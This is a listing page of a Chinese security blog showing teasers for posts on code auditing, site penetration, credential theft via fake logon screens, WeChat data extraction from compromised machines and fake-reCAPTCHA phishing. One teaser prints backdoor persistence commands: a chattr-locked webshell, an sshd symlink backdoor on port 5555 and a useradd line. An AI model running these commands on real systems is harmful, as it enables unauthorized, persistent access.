网络安全 第23页
XSS社区是网络安全爱好者聚集地
代码审计-TP5 框架及无框架变量覆盖反序列化-XSS博客

代码审计-TP5 框架及无框架变量覆盖反序列化

漏洞关键字 SQL 注入:select insert update mysql_query mysqli 等 文件上传:$_FILES,type=”file”,上传,move_uploaded_file() 等 XSS 跨站:print print_r echo sprintf die var_dump va...
xss-admin的头像-XSS博客xss-admin2年前
020414
记一次台湾网站的肾透-XSS博客

记一次台湾网站的肾透

记一次台湾网站的肾透
xss-admin的头像-XSS博客xss-admin2年前
029212
buro暴力破解保护失效绕过IP 封锁之登录次数限制-XSS博客
ProxyPoolxSocks Socks代理池服务端自动化搭建工具-XSS博客

ProxyPoolxSocks Socks代理池服务端自动化搭建工具

ProxyPoolxSocks Socks代理池服务端自动化搭建工具 Github项目: https://github.com/xsxtw/ProxyPoolxSocks 声明:本工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈...
xss-admin的头像-XSS博客xss-admin2年前
015413
xia SQL(瞎注) burp插件-XSS博客

xia SQL(瞎注) burp插件

xia SQL(瞎注) burp插件
xss-admin的头像-XSS博客xss-admin2年前
06615
上线机器微信聊天记录提取-XSS博客

上线机器微信聊天记录提取

微信聊天记录提取 https://github.com/AdminTest0/SharpWxDump 版本 < 3.7.0.30 只运行不登录能获取个人信息,登录后可以获取数据库密钥 版本 > 3.7.0.30 只运行不登录不能获取个人信息,登...
xss-admin的头像-XSS博客xss-admin2年前
01449
权限维持 - 后门隐藏技术-XSS博客

权限维持 – 后门隐藏技术

文件上锁 chattr +i webshell.php lsattr webshell.php chattr -i webshell.php ssh 软链接 ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555; useradd test -p test 不死马 访问该 php 文...
xss-admin的头像-XSS博客xss-admin2年前
017412
记一次Node.js站点渗透-XSS博客

记一次Node.js站点渗透

前言 遇到一个站,后端是Node.js写的,对于这种类型的站点,一般比较难getshell,但也实现了最终的目标,拿到后台权限 信息搜集 先进行常规的信息搜集,子域名扫描、端口扫描、目录扫描等 这个...
xss-admin的头像-XSS博客xss-admin2年前
015511
FakeLogonScreen – 伪造Windows登录屏幕以窃取密码-XSS博客

FakeLogonScreen – 伪造Windows登录屏幕以窃取密码

FakeLogonScreen – 伪造Windows登录屏幕以窃取密码
xss-admin的头像-XSS博客xss-admin2年前
028014
recaptcha phish 使用虚假reCAPTCHA进行网络钓鱼-XSS博客

recaptcha phish 使用虚假reCAPTCHA进行网络钓鱼

reCAPTCHA phish简介 这是用于重现 2024 年 8 月-9 月左右在野外发现的社会工程和网络钓鱼诱饵的小型工具。 攻击原理
xss-admin的头像-XSS博客xss-admin2年前
029910